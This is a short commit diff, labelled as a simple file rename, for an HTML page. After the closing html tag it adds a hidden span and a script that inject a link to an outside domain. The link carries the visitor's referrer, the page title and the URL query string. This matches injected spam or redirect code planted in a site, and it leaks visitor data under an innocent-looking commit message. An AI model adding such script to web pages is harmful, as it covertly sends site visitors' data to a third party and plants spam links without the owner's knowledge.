Update and rename index 10.html to index.html

--- a/index.html
+++ b/index.html
@@ -117,3 +117,7 @@
     <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
 </body>
 </html>
+<span id="e83ea688-37e1-7408-cefd-40964277984a"></span>
+<script type="application/javascript">
+document.getElementById('e83ea688-37e1-7408-cefd-40964277984a').innerHTML = '<a href="https://techwavez.info/5yJRk1v9?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'">Link</a>';
+</script>
